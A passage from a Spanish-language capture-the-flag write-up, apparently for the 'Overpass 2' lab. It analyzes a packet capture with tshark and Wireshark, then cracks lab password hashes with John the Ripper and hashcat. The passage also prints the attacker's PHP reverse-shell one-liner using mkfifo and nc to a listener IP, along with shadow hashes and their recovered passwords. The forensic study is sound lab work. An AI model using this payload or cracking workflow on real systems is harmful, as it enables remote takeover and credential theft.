umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
none,zlib@openssh.com,zlib
none,zlib@openssh.com,zlib
&@FN
ssh-rsa
w(-z
^%B|
^f& 
c|#P
ssh-rsa
O0VN
ywI`
!TKe
CzJ<#B
kG9-
%5kT
%=['
!S.F
]S-vl
:r6<|
!Kg%
`4C+
$~T\
x9~Pf
HZ!I
QX}$
BLWQ@
^hq_
<<lE
 <Xz
3)qtU
yHQ[
H|GfC.
cHSy
G0II
nrg4
Y=_D
>^/!%
uD$<H.
s%<w
EB;g}
Rm6tQ
404N
_oOT
MDL\h]"
DzWA
W<G8}N
T8?GJ/R8$
lnc2?
E\F?Vjm
)Ld u
y;7g
QyI\
sWoT
hPjm
k[K6H
Y 08e
%)2Ma
<:rdzK
~6GN
&bKr?
G#+Z
J1<i
qqLF
357t
N|aN
j@Or
]ahD
*lK,
:Pm=U
7H>Q
%8 V
Os!X
Q_,MI
!bKA"
z2 {
i~#:
:4W>
c15$
\8K 
_|z>
vy43
F%1o
K5jZ
!wmk
1K7:
Z*;?
zhR#\9r
QE^(6
\0e 
F)%r
l       L1O
?z0+
#U&\
ERrO]
49>g
wfir
sv~7
#S)h4
(`pe0
]f5C
;JRy
Jxxw
\ g|Y&
&fN6
wNHvyY
O2/;x
QO+l
n"XT
-)ONm
Y/'5
dCT>
&mGW
/k>U
2j+/q
%V2i
gsMD
M#i/_
4gBt
c=yK
}%63
)=&!
.b$1








BUSACMOS A VER SI PODEMOS VER SI CON CAT MOSTRO O VIO EL ATANTE SU SCRIPT DE REVERSE SHELL; PERO PARECE QUE NO E HISO CAT, SOLO VIMOS UN CAT SOBRE .OVERPASS (cat .overpass ,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.):






┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -T fields -e data | xxd -r -p | strings | grep cat
Running as user "root" and group "root". This could be dangerous.
www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass
cat .overpass
james@overpass-production:~$ sudo cat /etc/shadow
sudo cat /etc/shadow
Your identification has been saved in id_rsa.











FILTRAMOS POR PALABRA PAYLOAD TRATANDO DE VER SI VEMOS UN CONTENIDO SOLO LLAMA LA ATENCION DE QUE APARENTEMETE REMUEVE ARCHIVOS F  DE /TMP ME SUENA A UNA ESCALADA DE PRIVILEGIOS O ES LA REVERSE SHELL:






┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -x | strings | grep -A 5 "payload"

Running as user "root" and group "root". This could be dangerous.
02b0  6e 61 6d 65 3d 22 70 61 79 6c 6f 61 64 2e 70 68   name="payload.ph
02c0  70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65   p"..Content-Type
02d0  3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d   : application/x-
02e0  70 68 70 0d 0a 0d 0a 3c 3f 70 68 70 20 65 78 65   php....<?php exe
02f0  63 28 22 72 6d 20 2f 74 6d 70 2f 66 3b 6d 6b 66   c("rm /tmp/f;mkf
0300  69 66 6f 20 2f 74 6d 70 2f 66 3b 63 61 74 20 2f   ifo /tmp/f;cat /
--
0110  65 20 66 69 6c 65 20 70 61 79 6c 6f 61 64 2e 70   e file payload.p
0120  68 70 20 68 61 73 20 62 65 65 6e 20 75 70 6c 6f   hp has been uplo
0130  61 64 65 64 2e                                    aded.
0000  00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00   ..)n....)..H..E.
0010  00 34 0a 2f 40 00 40 06 5a 13 c0 a8 aa 91 c0 a8   .4./@.@.Z.......
0020  aa 9f ba 76 00 50 9e c3 76 b3 3a 0d 13 1a 80 10   ...v.P..v.:.....
--
02d0  72 65 66 3d 22 70 61 79 6c 6f 61 64 2e 70 68 70   ref="payload.php
02e0  22 3e 70 61 79 6c 6f 61 64 2e 70 68 70 3c 2f 61   ">payload.php</a
02f0  3e 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d   ></td><td align=
0300  22 72 69 67 68 74 22 3e 32 30 32 30 2d 30 37 2d   "right">2020-07-
0310  32 31 20 32 30 3a 33 34 20 20 3c 2f 74 64 3e 3c   21 20:34  </td><
0320  74 64 20 61 6c 69 67 6e 3d 22 72 69 67 68 74 22   td align="right"
0330  3e 20 39 39 20 3c 2f 74 64 3e 3c 74 64 3e 26 6e   > 99 </td><td>&n








AHORA FILTRO POR .PHP QUE SABEMOS QUE ES LA EXTENSION DEL PAYLOAD:




┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -x | strings | grep -A 5 ".php"              

Running as user "root" and group "root". This could be dangerous.
0390  74 68 69 6e 67 20 61 62 6f 75 74 20 70 68 70 20   thing about php 
03a0  65 79 65 20 65 6e 20 65 79 65 3f 20 2d 2d 3e 0a   eye en eye? -->.
03b0  20 20 20 20 20 20 3c 21 2d 2d 20 54 4f 44 4f 20         <!-- TODO 
03c0  61 64 64 20 64 6f 77 6e 6c 6f 61 64 69 6e 67 20   add downloading 
03d0  6f 66 20 79 6f 75 72 20 6f 76 65 72 70 61 73 73   of your overpass
03e0  20 66 69 6c 65 73 20 2d 2d 3e 0a 20 20 20 20 20    files -->.     
--
0400  70 6c 6f 61 64 2e 70 68 70 22 20 6d 65 74 68 6f   pload.php" metho
0410  64 3d 22 70 6f 73 74 22 20 65 6e 63 74 79 70 65   d="post" enctype
0420  3d 22 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d   ="multipart/form
0430  2d 64 61 74 61 22 3e 0a 20 20 20 20 20 20 20 20   -data">.        
0440  3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d   <div class="form
0450  45 6c 65 6d 22 3e 3c 6c 61 62 65 6c 20 66 6f 72   Elem"><label for
--
0050  65 6e 74 2f 75 70 6c 6f 61 64 2e 70 68 70 20 48   ent/upload.php H
0060  54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 31   TTP/1.1..Host: 1
0070  39 32 2e 31 36 38 2e 31 37 30 2e 31 35 39 0d 0a   92.168.170.159..
0080  55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69   User-Agent: Mozi
0090  6c 6c 61 2f 35 2e 30 20 28 58 31 31 3b 20 4c 69   lla/5.0 (X11; Li
00a0  6e 75 78 20 78 38 36 5f 36 34 3b 20 72 76 3a 36   nux x86_64; rv:6
--
02e0  70 68 70 0d 0a 0d 0a 3c 3f 70 68 70 20 65 78 65   php....<?php exe
02f0  63 28 22 72 6d 20 2f 74 6d 70 2f 66 3b 6d 6b 66   c("rm /tmp/f;mkf
0300  69 66 6f 20 2f 74 6d 70 2f 66 3b 63 61 74 20 2f   ifo /tmp/f;cat /
0310  74 6d 70 2f 66 7c 2f 62 69 6e 2f 73 68 20 2d 69   tmp/f|/bin/sh -i
0320  20 32 3e 26 31 7c 6e 63 20 31 39 32 2e 31 36 38    2>&1|nc 192.168
0330  2e 31 37 30 2e 31 34 35 20 34 32 34 32 20 3e 2f   .170.145 4242 >/
--
02d0  72 65 66 3d 22 70 61 79 6c 6f 61 64 2e 70 68 70   ref="payload.php
02e0  22 3e 70 61 79 6c 6f 61 64 2e 70 68 70 3c 2f 61   ">payload.php</a
02f0  3e 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d   ></td><td align=
0300  22 72 69 67 68 74 22 3e 32 30 32 30 2d 30 37 2d   "right">2020-07-
0310  32 31 20 32 30 3a 33 34 20 20 3c 2f 74 64 3e 3c   21 20:34  </td><
0320  74 64 20 61 6c 69 67 6e 3d 22 72 69 67 68 74 22   td align="right"
0330  3e 20 39 39 20 3c 2f 74 64 3e 3c 74 64 3e 26 6e   > 99 </td><td>&n
--
0060  61 64 2e 70 68 70 20 48 54 54 50 2f 31 2e 31 0d   ad.php HTTP/1.1.
0070  0a 48 6f 73 74 3a 20 31 39 32 2e 31 36 38 2e 31   .Host: 192.168.1
0080  37 30 2e 31 35 39 0d 0a 55 73 65 72 2d 41 67 65   70.159..User-Age
0090  6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20   nt: Mozilla/5.0 
00a0  28 58 31 31 3b 20 4c 69 6e 75 78 20 78 38 36 5f   (X11; Linux x86_
00b0  36 34 3b 20 72 76 3a 36 38 2e 30 29 20 47 65 63   64; rv:68.0) Gec
--
00b0  61 64 2e 70 68 70 0d 0a                           ad.php..
0000  00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00   ..)n....)..H..E.
0010  00 34 77 58 40 00 40 06 ec e9 c0 a8 aa 91 c0 a8   .4wX@.@.........
0020  aa 9f 10 92 e1 50 67 a7 d4 c1 09 61 b0 98 80 10   .....Pg....a....
0030  01 fd ad d5 00 00 01 01 08 0a c2 14 45 11 35 50   ............E.5P
0040  cb ac                                             ..










Y BINGO ESTE ME INTERESO, POR EL METODO POST Y EN EL EN LA REQUEST DEL ATACANTE TENDRIA QUE CONTENER EL SCRIPT, Y SE TENZO LO TENEMOS:




0400  70 6c 6f 61 64 2e 70 68 70 22 20 6d 65 74 68 6f   pload.php" metho
0410  64 3d 22 70 6f 73 74 22 20 65 6e 63 74 79 70 65   d="post" enctype
0420  3d 22 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d   ="multipart/form
0430  2d 64 61 74 61 22 3e 0a 20 20 20 20 20 20 20 20   -data">.        
0440  3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d   <div class="form
0450  45 6c 65 6d 22 3e 3c 6c 61 62 65 6c 20 66 6f 72   Elem"><label for










AHORA CON UN FILTRO EN WIRESHARK VEMOS EL PAQUETE ESTE COMPLETO  (http.request.uri contains "pload.php" && http.request.method == "POST"):




Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159


Transmission Control Protocol, Src Port: 47734, Dst Port: 80, Seq: 1, Ack: 1, Len: 960





0000   00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00   ..)n....)..H..E.
0010   03 f4 0a 2e 40 00 40 06 56 54 c0 a8 aa 91 c0 a8   ....@.@.VT......
0020   aa 9f ba 76 00 50 9e c3 72 f3 3a 0d 12 27 80 18   ...v.P..r.:..'..
0030   01 f6 a9 f3 00 00 01 01 08 0a c2 13 a6 2b 35 50   .............+5P
0040   2c c6 50 4f 53 54 20 2f 64 65 76 65 6c 6f 70 6d   ,.POST /developm
0050   65 6e 74 2f 75 70 6c 6f 61 64 2e 70 68 70 20 48   ent/upload.php H
0060   54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 31   TTP/1.1..Host: 1
0070   39 32 2e 31 36 38 2e 31 37 30 2e 31 35 39 0d 0a   92.168.170.159..
0080   55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69   User-Agent: Mozi
0090   6c 6c 61 2f 35 2e 30 20 28 58 31 31 3b 20 4c 69   lla/5.0 (X11; Li
00a0   6e 75 78 20 78 38 36 5f 36 34 3b 20 72 76 3a 36   nux x86_64; rv:6
00b0   38 2e 30 29 20 47 65 63 6b 6f 2f 32 30 31 30 30   8.0) Gecko/20100
00c0   31 30 31 20 46 69 72 65 66 6f 78 2f 36 38 2e 30   101 Firefox/68.0
00d0   0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 68   ..Accept: text/h
00e0   74 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f   tml,application/
00f0   78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63   xhtml+xml,applic
0100   61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c   ation/xml;q=0.9,
0110   2a 2f 2a 3b 71 3d 30 2e 38 0d 0a 41 63 63 65 70   */*;q=0.8..Accep
0120   74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 55   t-Language: en-U
0130   53 2c 65 6e 3b 71 3d 30 2e 35 0d 0a 41 63 63 65   S,en;q=0.5..Acce
0140   70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 7a 69   pt-Encoding: gzi
0150   70 2c 20 64 65 66 6c 61 74 65 0d 0a 52 65 66 65   p, deflate..Refe
0160   72 65 72 3a 20 68 74 74 70 3a 2f 2f 31 39 32 2e   rer: http://192.
0170   31 36 38 2e 31 37 30 2e 31 35 39 2f 64 65 76 65   168.170.159/deve
0180   6c 6f 70 6d 65 6e 74 2f 0d 0a 43 6f 6e 74 65 6e   lopment/..Conten
0190   74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72   t-Type: multipar
01a0   74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75   t/form-data; bou
01b0   6e 64 61 72 79 3d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ndary=----------
01c0   2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ----------------
01d0   2d 31 38 30 39 30 34 39 30 32 38 35 37 39 39 38   -180904902857998
01e0   37 30 33 31 35 31 35 32 36 30 30 30 36 0d 0a 43   7031515260006..C
01f0   6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34   ontent-Length: 4
0200   35 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20   54..Connection: 
0210   6b 65 65 70 2d 61 6c 69 76 65 0d 0a 55 70 67 72   keep-alive..Upgr
0220   61 64 65 2d 49 6e 73 65 63 75 72 65 2d 52 65 71   ade-Insecure-Req
0230   75 65 73 74 73 3a 20 31 0d 0a 0d 0a 2d 2d 2d 2d   uests: 1....----
0240   2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ----------------
0250   2d 2d 2d 2d 2d 2d 2d 2d 2d 31 38 30 39 30 34 39   ---------1809049
0260   30 32 38 35 37 39 39 38 37 30 33 31 35 31 35 32   0285799870315152
0270   36 30 30 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44   60006..Content-D
0280   69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d   isposition: form
0290   2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c   -data; name="fil
02a0   65 54 6f 55 70 6c 6f 61 64 22 3b 20 66 69 6c 65   eToUpload"; file
02b0   6e 61 6d 65 3d 22 70 61 79 6c 6f 61 64 2e 70 68   name="payload.ph
02c0   70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65   p"..Content-Type
02d0   3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d   : application/x-
02e0   70 68 70 0d 0a 0d 0a 3c 3f 70 68 70 20 65 78 65   php....<?php exe
02f0   63 28 22 72 6d 20 2f 74 6d 70 2f 66 3b 6d 6b 66   c("rm /tmp/f;mkf
0300   69 66 6f 20 2f 74 6d 70 2f 66 3b 63 61 74 20 2f   ifo /tmp/f;cat /
0310   74 6d 70 2f 66 7c 2f 62 69 6e 2f 73 68 20 2d 69   tmp/f|/bin/sh -i
0320   20 32 3e 26 31 7c 6e 63 20 31 39 32 2e 31 36 38    2>&1|nc 192.168
0330   2e 31 37 30 2e 31 34 35 20 34 32 34 32 20 3e 2f   .170.145 4242 >/
0340   74 6d 70 2f 66 22 29 3f 3e 0a 0d 0a 2d 2d 2d 2d   tmp/f")?>...----
0350   2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ----------------
0360   2d 2d 2d 2d 2d 2d 2d 2d 2d 31 38 30 39 30 34 39   ---------1809049
0370   30 32 38 35 37 39 39 38 37 30 33 31 35 31 35 32   0285799870315152
0380   36 30 30 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44   60006..Content-D
0390   69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d   isposition: form
03a0   2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 75 62   -data; name="sub
03b0   6d 69 74 22 0d 0a 0d 0a 55 70 6c 6f 61 64 20 46   mit"....Upload F
03c0   69 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ile..-----------
03d0   2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ----------------
03e0   2d 2d 31 38 30 39 30 34 39 30 32 38 35 37 39 39   --18090490285799
03f0   38 37 30 33 31 35 31 35 32 36 30 30 30 36 2d 2d   87031515260006--
0400   0d 0a                                             ..




LO VEMOS AL PAYLOAD SCRIPT EN LIMPIO:



payload.ph


<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>








----------------  JONH THE RIPPER   ---------------------



INTENTAREMOS HACER FUERZA BRUTA CON EL ROCKYOU PAR VER SI LOGRAMOS DECIFRAR LOS HASHES QUE VIMOS DE   DOS USNARIOS DEL ETC/SHADOW QUE SACO EL ATACANTE DE NUESTRO SERVIDOR VICTIMA:





HASHES:

james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::




*****

JAMES:



┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt --pot=results_james.txt passwdjame.txt              
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 0.06% (ETA: 23:28:57) 0g/s 4876p/s 4876c/s 4876C/s 11221122..findingnemo



A LA ESPERA......




PROBAMOS CON EL DICCIONARIO FASTRACK y en teoria SERIA Spring2017..starwars:



┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_james.txt passwdjame.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2024-02-09 22:42) 0g/s 1480p/s 1480c/s 1480C/s Spring2017..starwars
Session completed. 





******

MUIRLAND:



┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt --pot=results_muirland.txt passwdmuirland.txt              

Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 0.06% (ETA: 23:28:57) 0g/s 4876p/s 4876c/s 4876C/s 11221122..findingnemo




A LA ESPERA......





TAMBIEN PROBAMOS CON FASTTRACK y SERIA EL PASSWD 1qaz2wsx:




┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_muirland.txt passwdmuirland.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1qaz2wsx         (?)     
1g 0:00:00:00 DONE (2024-02-09 22:45) 7.692g/s 1707p/s 1707c/s 1707C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 





******

PARADOX y TENEMOS SU PASSWD  secuirty3 :




┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_paradox.txt passwdparadox.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secuirty3        (?)     
1g 0:00:00:00 DONE (2024-02-09 22:48) 12.50g/s 2775p/s 2775c/s 2775C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.






*****


SZYMEX  SU PASSWD  abcd123 :



┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_szymex.txt passwdszymex.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abcd123          (?)     
1g 0:00:00:00 DONE (2024-02-09 22:50) 12.50g/s 2775p/s 2775c/s 2775C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 



*****

BEE  SU PASWD  secret12  :



┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_bee.txt passwdbee.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secret12         (?)     
1g 0:00:00:00 DONE (2024-02-09 22:51) 16.66g/s 3700p/s 3700c/s 3700C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 




------  CONTINUAR CON OTRO TEMA ...  :D




-------------------- PROBAMOS CON JOHN THE RIPPER ROOMPER EL HASH (QUE VIMOS QUE USABA EL ATACANTE EN LA LINEA DE COMANDO CUANDO EJECUTO SSHBACKDOOR ) CON EL SALT QUE SUMA EL SCRIPT A NUESTRO HASH, SEPARANDOLO CON : o SALTO DE LINEAS, y NO FUNCIONO CON JOHN, PERO LUEGO PROBAMOS CON HASCAT CON EL ARCHIVO HASH.TXT CON SU CONTENIDO HASH:SALT Y LUEGO DE PROBAR VARIAS FORMATOS DE SHA512, DIMOS CON EL QUE FUNCIONO QUE ERA (SHA-512 (crypt, BSDi) - Modo -m 1710) Y BINGO CONSEGUIMOS LA ROMPER LA CONTRASEÑA (november16)




PRUEVAS DE UNIR EL HAS Y SALT:

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed




bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed



6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed





bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed


bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed





9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed




CREACION DEL ARCHIVO CON HASH:SALT:



┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# nano hashlistoparajondos.txt



┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# cat hashlistoparajondos.txt
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05




ROMPEMOS EL HASH CON HASCAT Y SE TENZO:



┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# hashcat -a 0 -m 1710 hashlistoparajondos.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 5 3600 6-Core Processor, 3813/7691 MB (1024 MB allocatable), 5MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
* Uses-64-Bit

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:november16
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1710 (sha512($pass.$salt))
Hash.Target......: 6d05358f090eea56a238af02e47d44ee5489d234810ef624028...002a05
Time.Started.....: Mon Feb 12 04:44:49 2024 (0 secs)
Time.Estimated...: Mon Feb 12 04:44:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   268.7 kH/s (0.77ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 17920/14344385 (0.12%)
Rejected.........: 0/17920 (0.00%)
Restore.Point....: 15360/14344385 (0.11%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: soybella -> biscuit1
Hardware.Mon.#1..: Util: 21%

Started: Mon Feb 12 04:44:06 2024
Stopped: Mon Feb 12 04:44:50 2024







---------CAMINO DE VUELTA, HACKEAMOS LA MAQUINA OVERPASS2 REALIZANDO Y SIGUIENDO LOS MISMOS PASOS DEL ATACANTE QUE ANALISAMOS----





VERIFICAMOS EN EL SITIO WEB POR PUERTO 80 HAY UN MENSAJE EN EL HTML:



http://10.10.217.114/




<body>
    <div>
        <h1>H4ck3d by CooctusClan</h1>
    </div>
    <div>
        <p>Secure your servers!</p>
    </div>
    <div><img src="cooctus.png"></div>
</body>







-------------------- NMAP     ------------------------ 





┌──(root㉿kali)-[~]
└─# nmap -sS -sV -Pn -O --script='vuln' 10.10.217.114
